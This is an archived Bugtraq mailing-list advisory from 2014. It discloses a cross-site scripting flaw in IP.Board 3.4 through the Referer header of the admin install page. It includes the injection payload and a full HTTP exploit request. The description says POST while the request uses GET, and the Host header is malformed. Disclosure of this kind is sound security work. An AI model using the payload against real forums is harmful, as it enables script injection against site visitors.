lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Message-Id: <201407162126.s6GLQh0C002427@sf01web2.securityfocus.com>
Date: Wed, 16 Jul 2014 21:26:43 GMT
From: stormhacker@...mail.com
To: bugtraq@...urityfocus.com
Subject: IP.Board 3.4 cross-site scripting in Referer header

+--------------------------------------------------------------------
+
+ IP.Board 3.4 cross-site scripting in Referer header
+
+--------------------------------------------------------------------
+ vendor site........: http://www.invisionpower.com
+ Affected Software .: IP.Board 3.4
+ Class .............: XSS
+ Risk ..............: high
+ Found by ..........: Ahmed atif abdou [ OCERT Ambassador Program - Oman National CERT ]
+ Facebook .: https://www.facebook.com/runvirus
+ Contact ...........: stormhacker[at]hotmail[.]com
+--------------------------------------------------------------------

[X] Affected Products:
=========================
test on  IP.Board 3.4.6 & IP.Board 3.4.4

maybe work under 3.4


[X] About the application:
=========================

IP.Board is the leading solution for creating an engaging discussion forum on the web.


[X] Vulnerability Description:
===============================
The attack is going with above-mentioned conditions. It's needed to send

POST request to http://path_forum/admin/install/index.php
 
with setting of Referer header.

Referer: 1" onmouseover=prompt(947671) bad="


[X] Exploit :
===============================

GET /admin/install/index.php HTTP/1.1
Referer: 1" onmouseover=prompt(11111111) bad="
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Cookie:
Host: localhost/admin/install/index.php
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

[X] Video proof :
===============================
https://www.youtube.com/watch?v=WYm4C611eyU&feature=youtu.be

+--------------------------------------------------------------------
+
+ Greets:
+ || rUnViRuS || - || Providor ||
+-------------------------[ W D T ]----------------------------------

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ